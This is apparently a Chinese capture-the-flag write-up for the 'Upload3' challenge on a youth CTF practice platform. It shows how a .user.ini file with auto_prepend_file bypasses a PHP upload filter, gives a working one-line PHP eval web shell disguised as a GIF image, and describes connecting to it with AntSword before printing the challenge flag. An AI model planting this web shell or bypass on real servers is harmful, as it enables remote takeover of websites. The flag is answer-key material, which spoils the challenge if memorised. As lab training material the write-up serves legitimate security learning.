青少年CTF练习平台~Upload3

目录

题目链接

https://www.qsnctf.com/

一、题目介绍

这次我学聪明啦!老板说要对上传点进行php的大小写过滤!这下看你怎么办!

二、上传.user.ini文件

bash 复制代码
auto_prepend_file=shell.png

上传成功

三、上传图片马(shell.png)

bash 复制代码
GIF89a
<?php @eval($_POST['cmd']);?>

上传成功

四、访问首页文件

当访问 index.php 时,PHP 引擎启动,读取目录下的 .user.ini,发现配置要求先加载 sell.png,于是它会先执行 shell.png 里的恶意代码,再执行首页原本的代码。

五、连接蚁剑

启动蚁剑连接shell(pass:cmd)

http://challenge.qsnctf.com:33578/index.php

连接成功

flag在根目录

flag{8ebfefb382d94eed9e1ef57e401492e7}

相关推荐
一名优秀的码农2 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
努力的lpp2 天前
SQLMap CTF 常用命令全集
数据库·web安全·网络安全·sql注入
努力的lpp2 天前
SQL 报错注入
数据库·sql·web安全·网络安全·sql注入
岛屿旅人3 天前
2025年中东地区网络安全态势综述
网络·安全·web安全·网络安全
努力的lpp3 天前
【ctf常用备用文件名字典】
web安全·网络安全·ctf
Mikowoo0073 天前
渗透测试_漏洞利用
网络安全
啥都想学点3 天前
pikachu靶场——Cross-Site Scripting-1(Kali系统)
网络安全
F1FJJ3 天前
基于网络隐身的内网穿透
网络协议·网络安全·go
苏天夏3 天前
Passport 插件:Typecho 密码安全的技术守护者
安全·网络安全·php
Lust Dusk3 天前
CTFHUB靶场 HTTP协议——302跳转
web安全·网络安全